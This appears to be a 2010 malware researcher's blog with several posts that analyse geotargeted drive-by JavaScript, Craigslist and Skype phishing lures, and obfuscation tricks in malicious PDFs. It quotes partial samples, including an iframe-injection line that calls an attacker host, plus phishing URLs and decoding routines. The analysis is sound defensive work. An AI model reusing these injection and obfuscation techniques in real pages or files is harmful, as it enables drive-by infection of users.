blog
December 15, 2010
Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:
var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0) {
document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}
The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.
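To see which visitors the script spares, the same check can be replayed offline against a list of URLs. The following is a minimal sketch, not the attacker's code: the helper name isSpared and the example URLs are my own, and the logic simply mirrors the substring/indexOf test of the sample.

```javascript
// Suffixes the malicious script looks for (taken from the sample).
var sparedDomains = [".gov.cn", ".edu.cn"];

// Hypothetical helper: returns true if the script would do nothing for this URL.
function isSpared(url) {
  var s = url + "";
  // Same host extraction as the sample: skip the 7 characters of "http://".
  var host = s.substring(7, s.indexOf("/", 7));
  for (var i = 0; i < sparedDomains.length; i++) {
    if (host.indexOf(sparedDomains[i]) > -1) {
      return true;
    }
  }
  return false;
}

console.log(isSpared("http://www.example.gov.cn/index.html"));  // true
console.log(isSpared("http://www.example.com/index.html"));     // false
console.log(isSpared("https://www.example.gov.cn/index.html")); // false
```

The last call shows a side effect of the hard-coded offset of 7: for an https:// URL the extracted host is the empty string, so the check never matches and the iframe would be written regardless of the domain.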
Certainly not new, but still interesting...
December 11, 2010
Another interesting attack that targets Craigslist users. I've just received an email with the following content:
Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html
Thank you.
Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist.
It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.
Stay away from this guy and this site...
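The mismatch between the URL shown in the email and the URL it really points to can be checked mechanically. Here is a small sketch, assuming an environment that provides the standard URL class (a browser or a recent Node.js); the helper names hostOf and isMismatched are my own.

```javascript
// Hypothetical helper: extract the lowercase host name from a URL string.
function hostOf(url) {
  return new URL(url).hostname.toLowerCase();
}

// Returns true when the displayed URL and the real target live on different hosts.
function isMismatched(shownUrl, actualUrl) {
  return hostOf(shownUrl) !== hostOf(actualUrl);
}

var shown = "http://sfbay.craigslist.org/1153605583.html";
var actual = "http://031e0e2.netsolhost.com/?check=item-id-1153605583.html";
console.log(isMismatched(shown, actual)); // true
```

A comparison of exact host names is deliberately crude: it flags this email, but it would also flag legitimate redirectors, so treat it as a first filter only.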
November 15, 2010
Another trick that is becoming more and more common in malicious PDF files consists of storing the actual malicious content (for example, JavaScript code that exploits some vulnerability) in XFA forms. If you remember the getPageNthWord, getAnnots, and info tricks that have been documented earlier, you will recognize the technique being used here.
So, what is an XFA form? XFA stands for XML Forms Architecture and it is a specification used to create form templates (forms that can be filled in by a user) and to process them (for example, validate their contents). Support for XFA forms in PDF files was introduced by Adobe with PDF 1.5. If you want to know all the gory details, you can refer to the original XFA proposal or to Adobe's XFA specification, which, at 1123 pages, may be a hard read.
Let's see how it is abused in practice (the MD5 of the sample I'm analyzing is 1f26dcd4520a6965a42cefa4c7641334). The PDF first defines an XFA template, which is used to describe the appearance and interactive characteristics of the form.
obj 10 0
<<
/Type /EmbeddedFile
/Length 618
/Filter /FlateDecode
>>
stream
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="artsLei">
<pageSet>
<pageArea id="leiArts" name="leiArts">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt" name="docTaut">
<field h="65mm" name="docArts" w="85mm" x="53.6501mm" y="88.6499mm">
<event activity="initialize" name="tautDoc">
<script contentType="application/x-javascript">
var nil = (function(){return this;}).call(null);
...
eval_ref(decode(docArts[\'ra\'+ue+\'wVa\'+ue+\'lue\'].substring(50),eval_ref));
</script>
</event>
<ui><imageEdit/></ui>
</field>
</subform>
</subform>
</template>
endstream
endobj
A couple of interesting parts: the template defines a field, named
docArts. Note that a reference to this field will be available through
an object named docArts in the global scope of JavaScript (i.e.,
this.docArts is a Field object that represents this field).
The field also has an event handler to handle its initialization. The
handler is written in JavaScript and has the familiar aspect of
obfuscated code.
Let's see what this code does:
var nil = (function(){return this;}).call(null);
var eval_ref = nil['eval'];
function decode(str, ev){
var ret = '';
var cvc = [];
var fcc = String.fromCharCode;
var k = docArts['rawValue'].substring(0, 50);
...
return ret;
}
eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));
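As an aside, the first two lines deserve a note. Calling a non-strict function with this set to null makes this default to the global object, so nil ends up referring to the global scope and eval_ref to the built-in eval, without a direct eval(...) call ever appearing in the code. A small sketch of the idiom outside of a PDF reader follows; the fallback to globalThis is my addition, in case the snippet is run in strict mode, where this would stay null.

```javascript
// In non-strict code, a null "this" is replaced by the global object.
var nil = (function () { return this; }).call(null);

// Assumption: fall back to globalThis if the code runs in strict mode.
var globalObj = nil || globalThis;

// Look up eval by name, as the malicious handler does.
var evalRef = globalObj["eval"];

var result = evalRef("6 * 7");
console.log(result); // 42
```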
The interesting bits here are the references to the docArts object.
Notice that its rawValue property is retrieved. So, where is the value
of the field stored? In an XFA dataset:
obj 12 0
<<
/Filter /FlateDecode
/Length 3388
/Type /EmbeddedFile
>>
stream
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<artsLei>
<docArts>
[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]
[80,87,70,83,71,77,80,88,16,
...
78,66,74,79,21,86,79,68,8,9,59]
</docArts>
</artsLei>
</xfa:data>
</xfa:datasets>
endstream
endobj
Therefore, the obfuscated JavaScript extracts the data stored for the docArts field (precisely, all the content after the initial 50 characters) and passes it to the decoding routine. The decoding routine also uses the docArts data (the first 50 characters) to recover the malicious code in the clear, which is then ready to be evaluated. The execution finally results in the exploitation of the CVE-2010-0188 vulnerability (libTiff overflow).
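The 50-character split is easy to reproduce when examining such a sample by hand. In the sketch below, the key is the first line of the dataset shown earlier (it is exactly 50 characters long), while the payload is a shortened, hypothetical stand-in closed after the first nine values, since the real one is elided in the listing. The helper name splitFieldValue is mine. How decode actually uses the ranges is not shown in the post, so I don't attempt to reconstruct it here.

```javascript
// Key: first line of the docArts data. Payload: truncated stand-in (assumption).
var rawValue =
  "[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]" +
  "[80,87,70,83,71,77,80,88,16]";

// Hypothetical helper mirroring the two substring() calls in the handler.
function splitFieldValue(value) {
  return {
    key: value.substring(0, 50),   // what decode() reads as k
    payload: value.substring(50)   // what is passed to decode() as str
  };
}

var parts = splitFieldValue(rawValue);
var ranges = JSON.parse(parts.key);

console.log(parts.key.length); // 50
console.log(ranges.length);    // 6
console.log(parts.payload);    // [80,87,70,83,71,77,80,88,16]
```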
November 14, 2010
Here is another small trick that malicious PDFs use. The PDF contains JavaScript code similar to the following:
var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1= event["tar"+part4]["z"+part3+part3+"m"+part2+part1];
fun1 = fun1[1]+"nde"+part5;
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"abcdefghijklmnopqrstuvwxyz" +
"0123456789"+
"+/=";
function decode(input) {
...
enc1 = keyStr[fun1](input.charAt(i++));
...
}
var code = decode("Q2!#$%^&5a...#$%^&o=!#$%^&");
eval(code);
This script sets up some variables that are used in a decoding routine. As usual, the routine decodes a long string and the result is then interpreted via eval().
The interesting part is how fun1 is computed. Undoing the simple
obfuscation shows that it is initialized to event.target.zoomType.
Now, event.target is a reference to the Doc object. The Doc object's
property zoomType contains the current zoom type of the document. The
documentation lists 7 possible values. Adobe Reader seems to return FitWidth by default.
The next step in the script extracts the second character from the zoom
type string (the letter i) and concatenates it with other strings to obtain
indexOf.
A long way to get an i...
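The computation can be replayed outside of Adobe Reader by faking the one property the script reads. This is only a sketch: the event object below is a stand-in I made up for the real Acrobat environment, and buildName is a hypothetical wrapper around the sample's string concatenations.

```javascript
// Stand-in for the Acrobat environment: only the property the script reads.
var event = { target: { zoomType: "FitWidth" } };

// Hypothetical wrapper around the name-building steps of the sample.
function buildName(ev) {
  var part1 = "pe", part2 = "Ty", part3 = "o", part4 = "get", part5 = "xOf";
  // "tar"+"get" -> target, "z"+"o"+"o"+"m"+"Ty"+"pe" -> zoomType
  var zoom = ev["tar" + part4]["z" + part3 + part3 + "m" + part2 + part1];
  // Second character of the zoom type, then "nde" and "xOf".
  return zoom[1] + "nde" + part5;
}

var fun1 = buildName(event);
console.log(fun1);             // indexOf
console.log("ABC"[fun1]("B")); // 1
```

If the viewer (or a tool emulating it) reports a zoom type whose second character is not i, the computed name is not a valid method and the decoding routine fails, which may well be the point of the trick.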
September 15, 2010
I have been hit by what appears to be yet another round of Skype spam. As has happened before, this attack also seems to be related to fake AV scams.
Here is a screenshot of a contact request I've received today from some notific.alrm.us.13.

The full text of the contact request leaves little doubt about its intent:
This is an urgent Security Center Message ! Please click on "Add to Contacts" and follow instructions to update your system ! After adding contact, go to "Conversations" tab, read and follow instructions !
WINDOWS REQUIRES IMMEDIATE ATTENTION URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser !
FULL DETAILS OF SCAN RESULT BELOW
WINDOWS REQUIRES IMMEDIATE ATTENTION
ATTENTION ! Security Center has detected malware on your computer !
Affected Software:
Microsoft Windows 7 Microsoft Windows Vista Microsoft Windows XP Microsoft Windows Server 2003
Impact of Vulnerability: Remote Code Execution / Virus Infection / Unexpected shutdowns
Recommendation: Users running vulnerable version should install a repair utility immediately
Your system IS affected, download the patch from the address below ! Failure to do so may result in severe computer malfunction.
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser!
The advertised domain, www.updatedp.com, currently serves me the
default Apache "It works!" page. Interestingly, that domain has quite
a long history of maliciousness (at least all the way back to
2003!).
The following usernames are also likely to be involved in this scam:
July 2, 2010
I've just been targeted by an interesting malware attack on Craigslist. The attack works as follows. I am a legitimate user of Craigslist and I have just posted an announcement to sell an item. A few hours later, I receive an email asking:
u still offer?
I reply that the item is still available and, again after a few hours, I get the following email:
Thank you for getting back to me.
I just want to make sure i am going to buy the same which i am looking for.
I can't afford another mistake as i did in the past.
Please check the video and confirm that it's the same u have.
http://fav-vid.com/playvideo.php?video=jgahnYYNPe0
If its the same one I will be there today to buy it
Thanks
Mmmh, fairly generic message (no reference to the actual item I'm
selling) and a "vid" link... Smells phishy. Just to be sure, I follow
the link and after a few redirects I wind up on
http://favvids.net/playvideo.php?video=jgahnYYNPe0&feature=youtube_gdata&name=my_stuff
The picture above shows a screenshot of this site.
Notice the fake notification bar on the top that resembles the one used
by Internet Explorer. Of course, it turns out that we need a "player",
the FLVDirect Player, to
actually watch the video. Sounds familiar...
If I try to download the player, I am redirected to another site,
www.flvpro.com, which finally sends the binary.
The binary has fairly high detection on
VirusTotal (12/41 at this time).
Another curiosity: if one arrives on the site referenced in the email
with JavaScript disabled and attempts to download the player, he gets
redirected to www.thislinkhasbeendisabled.com, which laconically
announces:
This link has been disabled
It was surely a throw-away address, but as a reference, the original sender on Craigslist was allenekf6dok3z@aim.com.
Stay away from this guy and these sites...
May 12, 2010
If the Twitter accept bug of a couple of days ago really was caused by in-band signaling (and there seem to be few, if any, other reasonable explanations for it), then one has to wonder if we will ever learn from past history.
In-band signaling (mixing control and data on the same communication channel) is famous for being hard to get right and for having caused quite a few security failures in many different domains. Just to list a few well-known cases:
printf and the like mix data and control.
I'll close with the mandatory reference to Bell's corollary:
Those who cannot remember the past are condemned to repeat it
-- George Santayana
Possibly with a handicap
-- Bell
April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
See you in Raleigh!
February 22, 2010
Another simple trick that is often used by malicious PDF files consists of embedding the malicious JavaScript code in a PDF stream hidden below several stream filters.
Here is an example:
4 0 obj
<<
/Length 2839
/Filter [ /ASCIIHexDecode
/LZWDecode
/ASCII85Decode
/RunLengthDecode
/FlateDecode ]
>>stream
80124E6422E89C7A3517958CC302316CDE
...
08220861102A8595D813C3187E07C40400>
endstream
endobj
The stream's contents are decoded by applying the five specified filters in
order (ASCIIHexDecode, LZWDecode, ASCII85Decode,
RunLengthDecode, and FlateDecode).
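To make the "in order" part concrete, here is a minimal sketch of a filter pipeline. It assumes Node.js (for Buffer) and implements only the two simplest filters, ASCIIHexDecode and RunLengthDecode, following my reading of the PDF reference; the other three filters are left out, and the names FILTERS and applyFilters are mine.

```javascript
// ASCIIHexDecode: pairs of hex digits, whitespace ignored, '>' ends the data.
function asciiHexDecode(data) {
  var text = data.toString("latin1");
  var end = text.indexOf(">");
  if (end !== -1) text = text.substring(0, end);
  text = text.replace(/\s+/g, "");
  if (text.length % 2 === 1) text += "0"; // odd digit count: pad with a 0
  return Buffer.from(text, "hex");
}

// RunLengthDecode: 0..127 copies the next len+1 bytes, 129..255 repeats
// the next byte 257-len times, 128 marks the end of the data.
function runLengthDecode(data) {
  var out = [];
  var i = 0;
  while (i < data.length) {
    var len = data[i++];
    if (len === 128) break;
    if (len < 128) {
      for (var j = 0; j <= len && i < data.length; j++) out.push(data[i++]);
    } else {
      if (i >= data.length) break;
      var b = data[i++];
      for (var k = 0; k < 257 - len; k++) out.push(b);
    }
  }
  return Buffer.from(out);
}

// Only the filters implemented in this sketch.
var FILTERS = { ASCIIHexDecode: asciiHexDecode, RunLengthDecode: runLengthDecode };

// Apply the filters in the order they are listed in /Filter.
function applyFilters(data, names) {
  return names.reduce(function (buf, name) {
    if (!FILTERS[name]) throw new Error("filter not implemented in this sketch: " + name);
    return FILTERS[name](buf);
  }, data);
}

var encoded = Buffer.from("02414243FD5880>", "latin1");
var decoded = applyFilters(encoded, ["ASCIIHexDecode", "RunLengthDecode"]);
console.log(decoded.toString("latin1")); // ABCXXXX
```

The output of each filter is the input of the next one, which is why every additional layer forces a scanner to implement one more decoder before it can look at the JavaScript.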
See this Wepawet report to find out what happens after the decoding is done. These malicious PDFs seem to also have decent detection on VirusTotal (6/41, at the time of writing).
February 18, 2010
PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analyses of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
var s = '';
new Function(decode(2, 35))();
function decode(page, xor){
var l = this.getPageNumWords(2);
for(var i = 0; i < l; i++){
word = this.getPageNthWord(page, i);
var c = word.substr(word.length- 2, 2);
var p = unescape("%"+ c).charCodeAt(0);
s += String.fromCharCode(p ^ xor);
}
return s;
}
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that pages are 0-based in the PDF
API). It then loops through all the words in that page (via the
getPageNthWord function) and manipulates them. Let's see what the third
page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT indicates
the beginning of the text and, conversely, ET marks the end of the
text; 31.19 806.15 Td specifies the position of the text on the page;
and Tj is the display text operator. The actual textual content is
the string starting with kh29.
We can now go back to our decode routine. It is clear that it extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as hex numbers (e.g., 0x29), xors them with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
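The same decoding can be done offline on the words extracted from the page stream. This is a sketch rather than the sample's code: decodeWords is a name I picked, and I use parseInt instead of the unescape("%" + c) construct of the original, which should give the same value for two hex digits.

```javascript
// Decode a list of words: last two characters as hex, XORed with the key.
function decodeWords(words, xorKey) {
  var out = "";
  for (var i = 0; i < words.length; i++) {
    var hex = words[i].slice(-2);
    var value = parseInt(hex, 16);
    out += String.fromCharCode(value ^ xorKey);
  }
  return out;
}

// The first three words of the page shown earlier.
var pageText = " kh29 kh2a kh55";
var words = pageText.split(/\s+/).filter(function (w) { return w.length > 0; });

console.log(JSON.stringify(decodeWords(words, 35))); // "\n\tv"
```

The first three words decode to a newline, a tab, and the letter v, which is consistent with the beginning of an indented JavaScript statement.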
The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from which the malware is to be downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
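The body of encode_str is not shown in the sample, so the following is only my guess at what a table-driven substitution of this kind looks like: each character found in one table is replaced by the character at the same position in the other. The function name substitute and both tables are made up for illustration; they are not the sample's tables.

```javascript
// Hypothetical substitution: map characters of fromTable to those of toTable.
function substitute(str, fromTable, toTable) {
  var out = "";
  for (var i = 0; i < str.length; i++) {
    var ch = str.charAt(i);
    var idx = fromTable.indexOf(ch);
    // Characters that are not in the table are copied unchanged.
    out += idx === -1 ? ch : toTable.charAt(idx);
  }
  return out;
}

// Made-up tables, for illustration only.
var fromTable = "XQK";
var toTable = "htp";

console.log(substitute("XQQK:", fromTable, toTable)); // http:
```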
Wepawet now handles this type of malicious PDF file. See this report for an example.